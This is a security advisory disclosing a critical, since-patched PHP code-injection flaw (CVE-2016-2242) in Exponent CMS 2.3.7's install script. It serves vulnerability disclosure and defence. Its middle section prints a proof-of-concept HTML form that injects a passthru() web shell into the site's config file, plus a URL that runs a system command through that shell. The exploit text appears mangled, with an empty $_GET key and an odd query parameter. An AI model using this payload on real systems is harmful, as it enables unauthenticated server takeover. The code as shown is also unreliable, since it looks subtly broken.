Exponent 2.3.7 PHP Code Execution
Posted on 12 February 2016
Advisory ID: HTB23290 Product: Exponent Vendor: http://www.exponentcms.org/ Vulnerable Version(s): 2.3.7 and probably prior Tested Version: 2.3.7 Advisory Publication: January 13, 2016 [without technical details] Vendor Notification: January 13, 2016 Vendor Patch: January 23, 2016 Public Disclosure: February 3, 2016 Vulnerability Type: Code Injection [CWE-94] CVE Reference: CVE-2016-2242 Risk Level: Critical CVSSv3 Base Score: 10 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered critical vulnerability in Exponent CMS, which can be exploited to inject and execute arbitrary PHP code on the vulnerable system with the privileges of the web server. The vulnerability resides within "/install/index.php" script, when handling user-input data passed via "sc" HTTP POST parameter. The script is not deleted by default after installation of the web application. A remote unauthenticated attacker can permanently inject arbitrary PHP code into "/framework/conf/config.php" configuration file and execute it with privileges of the web server. The attacker will be able to run arbitrary system commands, gain complete control over the vulnerable website, its databases and even compromise the entire web server. A simple exploit below will modify "/framework/conf/config.php" file and inject simple web shell into it: <form action="http://[host]/install/index.php" method="post" name="main"> <input type="hidden" name='sc[",""); passthru($_GET[]' value='"]); // '> <input value="submit" id="btn" type="submit" /> </form> After successful PHP code injection, the attacker can execute arbitrary system command viathe web shell. The following example will display output of "/bin/ls" command for the current directory: http://[host]/index.php?,%27=ls ----------------------------------------------------------------------------------------------- Solution: Apply Patch #3 to Exponent CMS v2.3.7 More Information: https://exponentcms.lighthouseapp.com/projects/61783-exponent-cms/tickets/1345-exponent-security-vulnerability-notification http://www.exponentcms.org/news/security-notice-closing-an-exponent-security-vulnerability http://www.exponentcms.org/news/patch-3-released-for-v2-3-7 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23290 - https://www.htbridge.com/advisory/HTB23290 - Remote Code Execution in Exponent [2] Exponent - http://www.exponentcms.org/ - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.